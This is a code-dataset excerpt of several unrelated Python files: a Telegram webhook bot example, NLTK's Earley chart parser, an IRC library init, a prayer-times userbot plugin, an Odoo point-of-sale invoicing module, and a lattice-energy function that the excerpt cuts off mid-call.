ext (stringclasses, 9 values) | sha (stringlengths, 40 to 40) | content (stringlengths, 3 to 1.04M)
---|---|---|
py | 1a4b81987d3e067e2204ef50a05aa0607fb45971 | import asyncio
import ssl
import sys
from aiohttp import web
import aiogram
from aiogram import Bot, types, Version
from aiogram.contrib.fsm_storage.memory import MemoryStorage
from aiogram.dispatcher import Dispatcher
from aiogram.dispatcher.webhook import get_new_configured_app, SendMessage
from aiogram.types import ChatType, ParseMode, ContentType
from aiogram.utils.markdown import hbold, bold, text, link
TOKEN = 'BOT TOKEN HERE'
WEBHOOK_HOST = 'example.com' # Domain name or IP address where your bot is hosted.
WEBHOOK_PORT = 443 # The Telegram Bot API only allows webhooks on ports 443, 80, 88 or 8443
WEBHOOK_URL_PATH = '/webhook' # Part of URL
# These options are needed if you use a self-signed SSL certificate
# Instructions: https://core.telegram.org/bots/self-signed
WEBHOOK_SSL_CERT = './webhook_cert.pem' # Path to the ssl certificate
WEBHOOK_SSL_PRIV = './webhook_pkey.pem' # Path to the ssl private key
WEBHOOK_URL = f"https://{WEBHOOK_HOST}:{WEBHOOK_PORT}{WEBHOOK_URL_PATH}"
# Web app settings:
# Use a LAN address to listen for webhooks
# Use any available port in the range 1024-49151 if you're behind a proxy, or WEBHOOK_PORT if you handle webhooks directly
WEBAPP_HOST = 'localhost'
WEBAPP_PORT = 3001
BAD_CONTENT = ContentType.PHOTO & ContentType.DOCUMENT & ContentType.STICKER & ContentType.AUDIO
loop = asyncio.get_event_loop()
bot = Bot(TOKEN, loop=loop)
storage = MemoryStorage()
dp = Dispatcher(bot, storage=storage)
async def cmd_start(message: types.Message):
# Yep. aiogram allows you to respond directly in the webhook response.
# https://core.telegram.org/bots/api#making-requests-when-getting-updates
return SendMessage(chat_id=message.chat.id, text='Hi from webhook!',
reply_to_message_id=message.message_id)
async def cmd_about(message: types.Message):
# In this function, markdown utils are used for formatting the message text
return SendMessage(message.chat.id, text(
bold('Hi! I\'m just a simple telegram bot.'),
'',
text('I\'m powered by', bold('Python', Version(*sys.version_info[:]))),
text('With', link(text('aiogram', aiogram.VERSION), 'https://github.com/aiogram/aiogram')),
sep='\n'
), parse_mode=ParseMode.MARKDOWN)
async def cancel(message: types.Message):
# Get current state context
state = dp.current_state(chat=message.chat.id, user=message.from_user.id)
# If the current user is in any state, cancel it.
if await state.get_state() is not None:
await state.set_state(state=None)
return SendMessage(message.chat.id, 'Current action is canceled.')
# Otherwise do nothing
async def unknown(message: types.Message):
"""
Handler for unknown messages.
"""
return SendMessage(message.chat.id, f"I don't know what to do with content type `{message.content_type}`. Sorry :c")
async def cmd_id(message: types.Message):
"""
Return info about user.
"""
if message.reply_to_message:
target = message.reply_to_message.from_user
chat = message.chat
elif message.forward_from and message.chat.type == ChatType.PRIVATE:
target = message.forward_from
chat = message.forward_from or message.chat
else:
target = message.from_user
chat = message.chat
result_msg = [hbold('Info about user:'),
f"First name: {target.first_name}"]
if target.last_name:
result_msg.append(f"Last name: {target.last_name}")
if target.username:
result_msg.append(f"Username: {target.mention}")
result_msg.append(f"User ID: {target.id}")
result_msg.extend([hbold('Chat:'),
f"Type: {chat.type}",
f"Chat ID: {chat.id}"])
if chat.type != ChatType.PRIVATE:
result_msg.append(f"Title: {chat.title}")
else:
result_msg.append(f"Title: {chat.full_name}")
return SendMessage(message.chat.id, '\n'.join(result_msg), reply_to_message_id=message.message_id,
parse_mode=ParseMode.HTML)
async def on_startup(app):
# Demonstrate one of the available methods for registering handlers
# This command is available only in the main state (state=None)
dp.register_message_handler(cmd_start, commands=['start'])
# This handler is available in all states at any time.
dp.register_message_handler(cmd_about, commands=['help', 'about'], state='*')
dp.register_message_handler(unknown, content_types=BAD_CONTENT,
func=lambda message: message.chat.type == ChatType.PRIVATE)
# You are able to register one function handler for multiple conditions
dp.register_message_handler(cancel, commands=['cancel'], state='*')
dp.register_message_handler(cancel, func=lambda message: message.text.lower().strip() in ['cancel'], state='*')
dp.register_message_handler(cmd_id, commands=['id'], state='*')
dp.register_message_handler(cmd_id, func=lambda message: message.forward_from or
message.reply_to_message and
message.chat.type == ChatType.PRIVATE, state='*')
# Get current webhook status
webhook = await bot.get_webhook_info()
# If URL is bad
if webhook.url != WEBHOOK_URL:
# If the URL doesn't match the current one - remove webhook
if not webhook.url:
await bot.delete_webhook()
# Set new URL for webhook
await bot.set_webhook(WEBHOOK_URL, certificate=open(WEBHOOK_SSL_CERT, 'rb'))
# If you want to use a free certificate signed by Let's Encrypt, you only need to set the URL, without sending a certificate.
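# A minimal sketch of that case (assuming a CA-signed certificate, e.g. Let's Encrypt, is
# already installed on the server):
#     await bot.set_webhook(WEBHOOK_URL)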
async def on_shutdown(app):
"""
Graceful shutdown. This method is recommended by aiohttp docs.
"""
# Remove webhook.
await bot.delete_webhook()
# Close the FSM storage connection.
await dp.storage.close()
await dp.storage.wait_closed()
if __name__ == '__main__':
# Get instance of :class:`aiohttp.web.Application` with configured router.
app = get_new_configured_app(dispatcher=dp, path=WEBHOOK_URL_PATH)
# Setup event handlers.
app.on_startup.append(on_startup)
app.on_shutdown.append(on_shutdown)
# Generate SSL context
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
context.load_cert_chain(WEBHOOK_SSL_CERT, WEBHOOK_SSL_PRIV)
# Start web-application.
web.run_app(app, host=WEBAPP_HOST, port=WEBAPP_PORT, ssl_context=context)
# Note:
# If you run your bot behind an nginx or Apache web server, an SSL context is not required.
# Otherwise you need to set the `ssl_context` parameter.
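# A minimal sketch of the reverse-proxy case (same app, host and port as configured above,
# plain HTTP on the local socket):
#     web.run_app(app, host=WEBAPP_HOST, port=WEBAPP_PORT)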
|
py | 1a4b81ce1a50524f2390040e9991b59344fce152 | # -*- coding: utf-8 -*-
# Natural Language Toolkit: An Incremental Earley Chart Parser
#
# Copyright (C) 2001-2014 NLTK Project
# Author: Peter Ljunglöf <[email protected]>
# Rob Speer <[email protected]>
# Edward Loper <[email protected]>
# Steven Bird <[email protected]>
# Jean Mark Gawron <[email protected]>
# URL: <http://nltk.org/>
# For license information, see LICENSE.TXT
"""
Data classes and parser implementations for *incremental* chart
parsers, which use dynamic programming to efficiently parse a text.
A "chart parser" derives parse trees for a text by iteratively adding
"edges" to a "chart". Each "edge" represents a hypothesis about the tree
structure for a subsequence of the text. The "chart" is a
"blackboard" for composing and combining these hypotheses.
A parser is "incremental" if it guarantees that for all i, j where i < j,
all edges ending at i are built before any edges ending at j.
This is appealing for, say, speech recognizer hypothesis filtering.
The main parser class is ``EarleyChartParser``, which is a top-down
algorithm, originally formulated by Jay Earley (1970).
"""
from __future__ import print_function, division
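# A minimal usage sketch (the toy grammar is hypothetical; EarleyChartParser is defined
# later in this module):
#
#     >>> from nltk import CFG
#     >>> grammar = CFG.fromstring('''
#     ...     S -> NP VP
#     ...     NP -> 'I' | 'John'
#     ...     VP -> V NP
#     ...     V -> 'saw'
#     ... ''')
#     >>> parser = EarleyChartParser(grammar)
#     >>> chart = parser.chart_parse('I saw John'.split())
#     >>> for tree in chart.parses(grammar.start()):
#     ...     print(tree)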
from nltk.compat import xrange
from nltk.parse.chart import (Chart, ChartParser, EdgeI, LeafEdge, LeafInitRule,
BottomUpPredictRule, BottomUpPredictCombineRule,
TopDownInitRule, SingleEdgeFundamentalRule,
EmptyPredictRule,
CachedTopDownPredictRule,
FilteredSingleEdgeFundamentalRule,
FilteredBottomUpPredictCombineRule)
from nltk.parse.featurechart import (FeatureChart, FeatureChartParser,
FeatureTopDownInitRule,
FeatureTopDownPredictRule,
FeatureEmptyPredictRule,
FeatureBottomUpPredictRule,
FeatureBottomUpPredictCombineRule,
FeatureSingleEdgeFundamentalRule)
#////////////////////////////////////////////////////////////
# Incremental Chart
#////////////////////////////////////////////////////////////
class IncrementalChart(Chart):
def initialize(self):
# A sequence of edge lists contained in this chart.
self._edgelists = tuple([] for x in self._positions())
# The set of child pointer lists associated with each edge.
self._edge_to_cpls = {}
# Indexes mapping attribute values to lists of edges
# (used by select()).
self._indexes = {}
def edges(self):
return list(self.iteredges())
def iteredges(self):
return (edge for edgelist in self._edgelists for edge in edgelist)
def select(self, end, **restrictions):
edgelist = self._edgelists[end]
# If there are no restrictions, then return all edges.
if restrictions=={}: return iter(edgelist)
# Find the index corresponding to the given restrictions.
restr_keys = sorted(restrictions.keys())
restr_keys = tuple(restr_keys)
# If it doesn't exist, then create it.
if restr_keys not in self._indexes:
self._add_index(restr_keys)
vals = tuple(restrictions[key] for key in restr_keys)
return iter(self._indexes[restr_keys][end].get(vals, []))
def _add_index(self, restr_keys):
# Make sure it's a valid index.
for key in restr_keys:
if not hasattr(EdgeI, key):
raise ValueError('Bad restriction: %s' % key)
# Create the index.
index = self._indexes[restr_keys] = tuple({} for x in self._positions())
# Add all existing edges to the index.
for end, edgelist in enumerate(self._edgelists):
this_index = index[end]
for edge in edgelist:
vals = tuple(getattr(edge, key)() for key in restr_keys)
this_index.setdefault(vals, []).append(edge)
def _register_with_indexes(self, edge):
end = edge.end()
for (restr_keys, index) in self._indexes.items():
vals = tuple(getattr(edge, key)() for key in restr_keys)
index[end].setdefault(vals, []).append(edge)
def _append_edge(self, edge):
self._edgelists[edge.end()].append(edge)
def _positions(self):
return xrange(self.num_leaves() + 1)
class FeatureIncrementalChart(IncrementalChart, FeatureChart):
def select(self, end, **restrictions):
edgelist = self._edgelists[end]
# If there are no restrictions, then return all edges.
if restrictions=={}: return iter(edgelist)
# Find the index corresponding to the given restrictions.
restr_keys = sorted(restrictions.keys())
restr_keys = tuple(restr_keys)
# If it doesn't exist, then create it.
if restr_keys not in self._indexes:
self._add_index(restr_keys)
vals = tuple(self._get_type_if_possible(restrictions[key])
for key in restr_keys)
return iter(self._indexes[restr_keys][end].get(vals, []))
def _add_index(self, restr_keys):
# Make sure it's a valid index.
for key in restr_keys:
if not hasattr(EdgeI, key):
raise ValueError('Bad restriction: %s' % key)
# Create the index.
index = self._indexes[restr_keys] = tuple({} for x in self._positions())
# Add all existing edges to the index.
for end, edgelist in enumerate(self._edgelists):
this_index = index[end]
for edge in edgelist:
vals = tuple(self._get_type_if_possible(getattr(edge, key)())
for key in restr_keys)
this_index.setdefault(vals, []).append(edge)
def _register_with_indexes(self, edge):
end = edge.end()
for (restr_keys, index) in self._indexes.items():
vals = tuple(self._get_type_if_possible(getattr(edge, key)())
for key in restr_keys)
index[end].setdefault(vals, []).append(edge)
#////////////////////////////////////////////////////////////
# Incremental CFG Rules
#////////////////////////////////////////////////////////////
class CompleteFundamentalRule(SingleEdgeFundamentalRule):
def _apply_incomplete(self, chart, grammar, left_edge):
end = left_edge.end()
# When the chart is incremental, we only have to look for
# empty complete edges here.
for right_edge in chart.select(start=end, end=end,
is_complete=True,
lhs=left_edge.nextsym()):
new_edge = left_edge.move_dot_forward(right_edge.end())
if chart.insert_with_backpointer(new_edge, left_edge, right_edge):
yield new_edge
class CompleterRule(CompleteFundamentalRule):
_fundamental_rule = CompleteFundamentalRule()
def apply(self, chart, grammar, edge):
if not isinstance(edge, LeafEdge):
for new_edge in self._fundamental_rule.apply(chart, grammar, edge):
yield new_edge
class ScannerRule(CompleteFundamentalRule):
_fundamental_rule = CompleteFundamentalRule()
def apply(self, chart, grammar, edge):
if isinstance(edge, LeafEdge):
for new_edge in self._fundamental_rule.apply(chart, grammar, edge):
yield new_edge
class PredictorRule(CachedTopDownPredictRule):
pass
class FilteredCompleteFundamentalRule(FilteredSingleEdgeFundamentalRule):
def apply(self, chart, grammar, edge):
# Since the Filtered rule only works for grammars without empty productions,
# we only have to bother with complete edges here.
if edge.is_complete():
for new_edge in self._apply_complete(chart, grammar, edge):
yield new_edge
#////////////////////////////////////////////////////////////
# Incremental FCFG Rules
#////////////////////////////////////////////////////////////
class FeatureCompleteFundamentalRule(FeatureSingleEdgeFundamentalRule):
def _apply_incomplete(self, chart, grammar, left_edge):
fr = self._fundamental_rule
end = left_edge.end()
# When the chart is incremental, we only have to look for
# empty complete edges here.
for right_edge in chart.select(start=end, end=end,
is_complete=True,
lhs=left_edge.nextsym()):
for new_edge in fr.apply(chart, grammar, left_edge, right_edge):
yield new_edge
class FeatureCompleterRule(CompleterRule):
_fundamental_rule = FeatureCompleteFundamentalRule()
class FeatureScannerRule(ScannerRule):
_fundamental_rule = FeatureCompleteFundamentalRule()
class FeaturePredictorRule(FeatureTopDownPredictRule):
pass
#////////////////////////////////////////////////////////////
# Incremental CFG Chart Parsers
#////////////////////////////////////////////////////////////
EARLEY_STRATEGY = [LeafInitRule(),
TopDownInitRule(),
CompleterRule(),
ScannerRule(),
PredictorRule()]
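# (A note on the strategy above: LeafInitRule and TopDownInitRule are axioms (NUM_EDGES == 0),
#  while PredictorRule, ScannerRule and CompleterRule are the per-edge inference rules that
#  implement the Predictor / Scanner / Completer steps of Earley's algorithm.)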
TD_INCREMENTAL_STRATEGY = [LeafInitRule(),
TopDownInitRule(),
CachedTopDownPredictRule(),
CompleteFundamentalRule()]
BU_INCREMENTAL_STRATEGY = [LeafInitRule(),
EmptyPredictRule(),
BottomUpPredictRule(),
CompleteFundamentalRule()]
BU_LC_INCREMENTAL_STRATEGY = [LeafInitRule(),
EmptyPredictRule(),
BottomUpPredictCombineRule(),
CompleteFundamentalRule()]
LC_INCREMENTAL_STRATEGY = [LeafInitRule(),
FilteredBottomUpPredictCombineRule(),
FilteredCompleteFundamentalRule()]
class IncrementalChartParser(ChartParser):
"""
An *incremental* chart parser implementing Jay Earley's
parsing algorithm:
| For each index end in [0, 1, ..., N]:
| For each edge such that edge.end = end:
| If edge is incomplete and edge.next is not a part of speech:
| Apply PredictorRule to edge
| If edge is incomplete and edge.next is a part of speech:
| Apply ScannerRule to edge
| If edge is complete:
| Apply CompleterRule to edge
| Return any complete parses in the chart
"""
def __init__(self, grammar, strategy=BU_LC_INCREMENTAL_STRATEGY,
trace=0, trace_chart_width=50,
chart_class=IncrementalChart):
"""
Create a new Earley chart parser, that uses ``grammar`` to
parse texts.
:type grammar: CFG
:param grammar: The grammar used to parse texts.
:type trace: int
:param trace: The level of tracing that should be used when
parsing a text. ``0`` will generate no tracing output;
and higher numbers will produce more verbose tracing
output.
:type trace_chart_width: int
:param trace_chart_width: The default total width reserved for
the chart in trace output. The remainder of each line will
be used to display edges.
:param chart_class: The class that should be used to create
the charts used by this parser.
"""
self._grammar = grammar
self._trace = trace
self._trace_chart_width = trace_chart_width
self._chart_class = chart_class
self._axioms = []
self._inference_rules = []
for rule in strategy:
if rule.NUM_EDGES == 0:
self._axioms.append(rule)
elif rule.NUM_EDGES == 1:
self._inference_rules.append(rule)
else:
raise ValueError("Incremental inference rules must have "
"NUM_EDGES == 0 or 1")
def chart_parse(self, tokens, trace=None):
if trace is None: trace = self._trace
trace_new_edges = self._trace_new_edges
tokens = list(tokens)
self._grammar.check_coverage(tokens)
chart = self._chart_class(tokens)
grammar = self._grammar
# Width, for printing trace edges.
trace_edge_width = self._trace_chart_width // (chart.num_leaves() + 1)
if trace: print(chart.pp_leaves(trace_edge_width))
for axiom in self._axioms:
new_edges = list(axiom.apply(chart, grammar))
trace_new_edges(chart, axiom, new_edges, trace, trace_edge_width)
inference_rules = self._inference_rules
for end in range(chart.num_leaves()+1):
if trace > 1: print("\n* Processing queue:", end, "\n")
agenda = list(chart.select(end=end))
while agenda:
edge = agenda.pop()
for rule in inference_rules:
new_edges = list(rule.apply(chart, grammar, edge))
trace_new_edges(chart, rule, new_edges, trace, trace_edge_width)
for new_edge in new_edges:
if new_edge.end()==end:
agenda.append(new_edge)
return chart
class EarleyChartParser(IncrementalChartParser):
def __init__(self, grammar, **parser_args):
IncrementalChartParser.__init__(self, grammar, EARLEY_STRATEGY, **parser_args)
pass
class IncrementalTopDownChartParser(IncrementalChartParser):
def __init__(self, grammar, **parser_args):
IncrementalChartParser.__init__(self, grammar, TD_INCREMENTAL_STRATEGY, **parser_args)
class IncrementalBottomUpChartParser(IncrementalChartParser):
def __init__(self, grammar, **parser_args):
IncrementalChartParser.__init__(self, grammar, BU_INCREMENTAL_STRATEGY, **parser_args)
class IncrementalBottomUpLeftCornerChartParser(IncrementalChartParser):
def __init__(self, grammar, **parser_args):
IncrementalChartParser.__init__(self, grammar, BU_LC_INCREMENTAL_STRATEGY, **parser_args)
class IncrementalLeftCornerChartParser(IncrementalChartParser):
def __init__(self, grammar, **parser_args):
if not grammar.is_nonempty():
raise ValueError("IncrementalLeftCornerParser only works for grammars "
"without empty productions.")
IncrementalChartParser.__init__(self, grammar, LC_INCREMENTAL_STRATEGY, **parser_args)
#////////////////////////////////////////////////////////////
# Incremental FCFG Chart Parsers
#////////////////////////////////////////////////////////////
EARLEY_FEATURE_STRATEGY = [LeafInitRule(),
FeatureTopDownInitRule(),
FeatureCompleterRule(),
FeatureScannerRule(),
FeaturePredictorRule()]
TD_INCREMENTAL_FEATURE_STRATEGY = [LeafInitRule(),
FeatureTopDownInitRule(),
FeatureTopDownPredictRule(),
FeatureCompleteFundamentalRule()]
BU_INCREMENTAL_FEATURE_STRATEGY = [LeafInitRule(),
FeatureEmptyPredictRule(),
FeatureBottomUpPredictRule(),
FeatureCompleteFundamentalRule()]
BU_LC_INCREMENTAL_FEATURE_STRATEGY = [LeafInitRule(),
FeatureEmptyPredictRule(),
FeatureBottomUpPredictCombineRule(),
FeatureCompleteFundamentalRule()]
class FeatureIncrementalChartParser(IncrementalChartParser, FeatureChartParser):
def __init__(self, grammar,
strategy=BU_LC_INCREMENTAL_FEATURE_STRATEGY,
trace_chart_width=20,
chart_class=FeatureIncrementalChart,
**parser_args):
IncrementalChartParser.__init__(self, grammar,
strategy=strategy,
trace_chart_width=trace_chart_width,
chart_class=chart_class,
**parser_args)
class FeatureEarleyChartParser(FeatureIncrementalChartParser):
def __init__(self, grammar, **parser_args):
FeatureIncrementalChartParser.__init__(self, grammar, EARLEY_FEATURE_STRATEGY, **parser_args)
class FeatureIncrementalTopDownChartParser(FeatureIncrementalChartParser):
def __init__(self, grammar, **parser_args):
FeatureIncrementalChartParser.__init__(self, grammar, TD_INCREMENTAL_FEATURE_STRATEGY, **parser_args)
class FeatureIncrementalBottomUpChartParser(FeatureIncrementalChartParser):
def __init__(self, grammar, **parser_args):
FeatureIncrementalChartParser.__init__(self, grammar, BU_INCREMENTAL_FEATURE_STRATEGY, **parser_args)
class FeatureIncrementalBottomUpLeftCornerChartParser(FeatureIncrementalChartParser):
def __init__(self, grammar, **parser_args):
FeatureIncrementalChartParser.__init__(self, grammar, BU_LC_INCREMENTAL_FEATURE_STRATEGY, **parser_args)
#////////////////////////////////////////////////////////////
# Demonstration
#////////////////////////////////////////////////////////////
def demo(print_times=True, print_grammar=False,
print_trees=True, trace=2,
sent='I saw John with a dog with my cookie', numparses=5):
"""
A demonstration of the Earley parsers.
"""
import sys, time
from nltk.parse.chart import demo_grammar
# The grammar for ChartParser and SteppingChartParser:
grammar = demo_grammar()
if print_grammar:
print("* Grammar")
print(grammar)
# Tokenize the sample sentence.
print("* Sentence:")
print(sent)
tokens = sent.split()
print(tokens)
print()
# Do the parsing.
earley = EarleyChartParser(grammar, trace=trace)
t = time.clock()
chart = earley.chart_parse(tokens)
parses = list(chart.parses(grammar.start()))
t = time.clock()-t
# Print results.
if numparses:
assert len(parses)==numparses, 'Not all parses found'
if print_trees:
for tree in parses: print(tree)
else:
print("Nr trees:", len(parses))
if print_times:
print("Time:", t)
if __name__ == '__main__': demo()
|
py | 1a4b81f0759c582c3289f80f4c3f50560c0ee7d8 | #!/usr/bin/python3
# Copyright (c) 2016-2017, henry232323
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
"""A small, simple irc lib for python suitable for bots, clients and anything else.
For more information and documentation about the original package:
http://code.google.com/p/oyoyo/
For documentation on trioyoyo: http://trioyoyo.typheus.me/
"""
from .helpers import HelperClient
from .client import IRCClient, CommandClient
from .cmdhandler import protected, CommandHandler, DefaultCommandHandler, DefaultBotCommandHandler, BotCommandHandler
from . import _oyoyo
from ._oyoyo.parse import parse_nick, parse_raw_irc_command
from ._oyoyo.ircevents import all_events, generated_events, protocol_events, numeric_events
from ._oyoyo.cmdhandler import CommandError, NoSuchCommandError, ProtectedCommandError, IRCClientError
|
py | 1a4b83006188808151645c6f6101034af162ff93 | # ported from uniborg
# https://github.com/muhammedfurkan/UniBorg/blob/master/stdplugins/ezanvakti.py
import json
import requests
from userbot import CMD_HANDLER as cmd
from userbot import CMD_HELP
from userbot.modules.sql_helper.globals import gvarstatus
from userbot.utils import edit_delete, edit_or_reply, man_cmd
@man_cmd(pattern="adzan(?:\s|$)([\s\S]*)")
async def get_adzan(adzan):
"Shows you the Islamic prayer times of the given city name"
input_str = adzan.pattern_match.group(1)
LOKASI = gvarstatus("WEATHER_DEFCITY") or "Jakarta" if not input_str else input_str
url = f"http://muslimsalat.com/{LOKASI}.json?key=bd099c5825cbedb9aa934e255a81a5fc"
request = requests.get(url)
if request.status_code != 200:
return await edit_delete(
adzan, f"**Tidak Dapat Menemukan Kota** `{LOKASI}`", 120
)
result = json.loads(request.text)
catresult = f"<b>Jadwal Shalat Hari Ini:</b>\
\n<b>📆 Tanggal </b><code>{result['items'][0]['date_for']}</code>\
\n<b>📍 Kota</b> <code>{result['query']}</code> | <code>{result['country']}</code>\
\n\n<b>Terbit : </b><code>{result['items'][0]['shurooq']}</code>\
\n<b>Subuh : </b><code>{result['items'][0]['fajr']}</code>\
\n<b>Zuhur : </b><code>{result['items'][0]['dhuhr']}</code>\
\n<b>Ashar : </b><code>{result['items'][0]['asr']}</code>\
\n<b>Maghrib : </b><code>{result['items'][0]['maghrib']}</code>\
\n<b>Isya : </b><code>{result['items'][0]['isha']}</code>\
"
await edit_or_reply(adzan, catresult, "html")
CMD_HELP.update(
{
"adzan": f"**Plugin : **`adzan`\
\n\n • **Syntax :** `{cmd}adzan` <nama kota>\
\n • **Function : **Menunjukkan waktu jadwal sholat dari kota yang diberikan.\
"
}
)
|
py | 1a4b831b84f042b77813c59bf3ead356c5ddbdd4 | # Copyright 2017 Artyom Losev
# Copyright 2018 Kolushov Alexandr <https://it-projects.info/team/KolushovAlexandr>
# License MIT (https://opensource.org/licenses/MIT).
from odoo import _, api, fields, models
SO_CHANNEL = "pos_sale_orders"
INV_CHANNEL = "pos_invoices"
class PosOrder(models.Model):
_inherit = "pos.order"
@api.model
def create_from_ui(self, orders):
invoices_to_pay = [o for o in orders if o.get("data").get("invoice_to_pay")]
original_orders = [o for o in orders if o not in invoices_to_pay]
res = super(PosOrder, self).create_from_ui(original_orders)
if invoices_to_pay:
for inv in invoices_to_pay:
self.process_invoice_payment(inv)
return res
@api.model
def process_invoice_payment(self, invoice):
for statement in invoice["data"]["statement_ids"]:
inv_id = invoice["data"]["invoice_to_pay"]["id"]
inv_obj = self.env["account.invoice"].browse(inv_id)
journal_id = statement[2]["journal_id"]
journal = self.env["account.journal"].browse(journal_id)
amount = min(
statement[2]["amount"], # amount paid, including change
invoice["data"]["invoice_to_pay"]["residual"], # amount required to pay
)
cashier = invoice["data"]["user_id"]
writeoff_acc_id = False
payment_difference_handling = "open"
vals = {
"journal_id": journal.id,
"payment_method_id": 1,
"payment_date": invoice["data"]["creation_date"],
"communication": invoice["data"]["invoice_to_pay"]["number"],
"invoice_ids": [(4, inv_id, None)],
"payment_type": "inbound",
"amount": amount,
"currency_id": inv_obj.currency_id.id,
"partner_id": invoice["data"]["invoice_to_pay"]["partner_id"][0],
"partner_type": "customer",
"payment_difference_handling": payment_difference_handling,
"writeoff_account_id": writeoff_acc_id,
"pos_session_id": invoice["data"]["pos_session_id"],
"cashier": cashier,
}
payment = self.env["account.payment"].create(vals)
payment.post()
@api.model
def process_invoices_creation(self, sale_order_id):
order = self.env["sale.order"].browse(sale_order_id)
inv_id = order.action_invoice_create()
self.env["account.invoice"].browse(inv_id).action_invoice_open()
return inv_id
class AccountPayment(models.Model):
_inherit = "account.payment"
pos_session_id = fields.Many2one("pos.session", string="POS session")
cashier = fields.Many2one("res.users")
datetime = fields.Datetime(string="Datetime", default=fields.Datetime.now)
class AccountInvoice(models.Model):
_inherit = "account.invoice"
def action_updated_invoice(self):
message = {"channel": INV_CHANNEL, "id": self.id}
self.env["pos.config"].search([])._send_to_channel(INV_CHANNEL, message)
@api.model
def get_invoice_lines_for_pos(self, invoice_ids):
res = []
invoice_lines = self.env["account.invoice.line"].search(
[("invoice_id", "in", invoice_ids)]
)
for l in invoice_lines:
line = {
"invoice_id": l.invoice_id.id,
"id": l.id,
"name": l.name,
"account": l.account_id.name,
"product": l.product_id.name,
"price_unit": l.price_unit,
"qty": l.quantity,
"tax": [tax.name or " " for tax in l.invoice_line_tax_ids],
"discount": l.discount,
"amount": l.price_subtotal,
}
res.append(line)
return res
@api.depends("payment_move_line_ids.amount_residual")
def _get_payment_info_JSON(self):
for record in self:
if not record.payment_move_line_ids:
pass
for move in record.payment_move_line_ids:
if move.payment_id.cashier:
if move.move_id.ref:
move.move_id.ref = "{} by {}".format(
move.move_id.ref, move.payment_id.cashier.name
)
else:
move.move_id.name = "{} by {}".format(
move.move_id.name, move.payment_id.cashier.name
)
data = super(AccountInvoice, self)._get_payment_info_JSON()
return data
class SaleOrder(models.Model):
_inherit = "sale.order"
def action_updated_sale_order(self):
message = {"channel": SO_CHANNEL, "id": self.id}
self.env["pos.config"].search([])._send_to_channel(SO_CHANNEL, message)
@api.model
def get_order_lines_for_pos(self, sale_order_ids):
res = []
order_lines = self.env["sale.order.line"].search(
[("order_id", "in", sale_order_ids)]
)
for l in order_lines:
line = {
"order_id": l.order_id.id,
"id": l.id,
"name": l.name,
"product": l.product_id.name,
"uom_qty": l.product_uom_qty,
"qty_delivered": l.qty_delivered,
"qty_invoiced": l.qty_invoiced,
"tax": [tax.name or " " for tax in l.tax_id],
"discount": l.discount,
"subtotal": l.price_subtotal,
"total": l.price_total,
"invoiceble": (
(l.qty_delivered > 0) or (l.product_id.invoice_policy == "order")
),
}
res.append(line)
return res
class PosConfig(models.Model):
_inherit = "pos.config"
def _get_default_writeoff_account(self):
acc = self.env["account.account"].search([("code", "=", 220000)]).id
return acc if acc else False
show_invoices = fields.Boolean(help="Show invoices in POS", default=True)
show_sale_orders = fields.Boolean(help="Show sale orders in POS", default=True)
pos_invoice_pay_writeoff_account_id = fields.Many2one(
"account.account",
string="Difference Account",
help="The account is used for the difference between due and paid amount",
default=_get_default_writeoff_account,
)
invoice_cashier_selection = fields.Boolean(
string="Select Invoice Cashier",
help="Ask for a cashier when fetch invoices",
default=True,
)
sale_order_cashier_selection = fields.Boolean(
string="Select Sale Order Cashier",
help="Ask for a cashier when fetch orders",
default=True,
)
class PosSession(models.Model):
_inherit = "pos.session"
session_payments = fields.One2many(
"account.payment",
"pos_session_id",
string="Invoice Payments",
help="Show invoices paid in the Session",
)
session_invoices_total = fields.Float(
"Invoices", compute="_compute_session_invoices_total"
)
def _compute_session_invoices_total(self):
for rec in self:
rec.session_invoices_total = sum(
rec.session_payments.mapped("invoice_ids").mapped("amount_total") + [0]
)
def action_invoice_payments(self):
payments = self.env["account.payment"].search(
[("pos_session_id", "in", self.ids)]
)
invoices = payments.mapped("invoice_ids").ids
domain = [("id", "in", invoices)]
return {
"name": _("Invoice Payments"),
"type": "ir.actions.act_window",
"domain": domain,
"res_model": "account.invoice",
"view_type": "form",
"view_mode": "tree,form",
}
|
py | 1a4b833a5faa8fd3a3ea76fa37942c2da0cf26f1 | import numpy as np
import os
from singlecell.singlecell_functions import hamiltonian
from multicell.graph_adjacency import general_paracrine_field, general_exosome_field
def calc_lattice_energy(lattice, simsetup, field, fs, gamma, search_radius, exosome_remove_ratio,
exosome_string, meanfield, norm=True):
"""
Lattice energy is the multicell hamiltonian
H_multi = [Sum (H_internal)] - gamma * [Sum(interactions)] - fs * [app_field dot Sum(state)]
Returns total energy and the two main terms
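(Sketch of the mapping in the code below: H_multi = H_self + H_app + H_pairwise_scaled,
where the gamma/2 factor corrects for double-counting neighbour pairs and norm=True
divides each term by the number of cells.)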
"""
M1 = len(lattice)
M2 = len(lattice[0])
num_cells = M1 * M2
assert M1 == M2 # TODO relax
H_multi = 0
H_self = 0
H_pairwise = 0
H_app = 0
# compute self energies and applied field contribution separately
for i in range(M1):
for j in range(M2):
cell = lattice[i][j]
H_self += hamiltonian(cell.get_current_state(), simsetup['J'], field=None, fs=0.0)
if field is not None:
H_app -= fs * np.dot(cell.get_current_state().T, field)
# compute interactions # TODO check validity
# meanfield case
if meanfield:
mf_search_radius = None
# TODO ok that cell is neighbour with self as well? remove diag
mf_neighbours = [[a, b] for a in range(M2) for b in range(M1)]
else:
assert search_radius is not None
for i in range(M1):
for j in range(M2):
cell = lattice[i][j]
if meanfield:
nbr_states_sent, neighbours = cell.get_local_exosome_field(
lattice, mf_search_radius, M1, exosome_string=exosome_string,
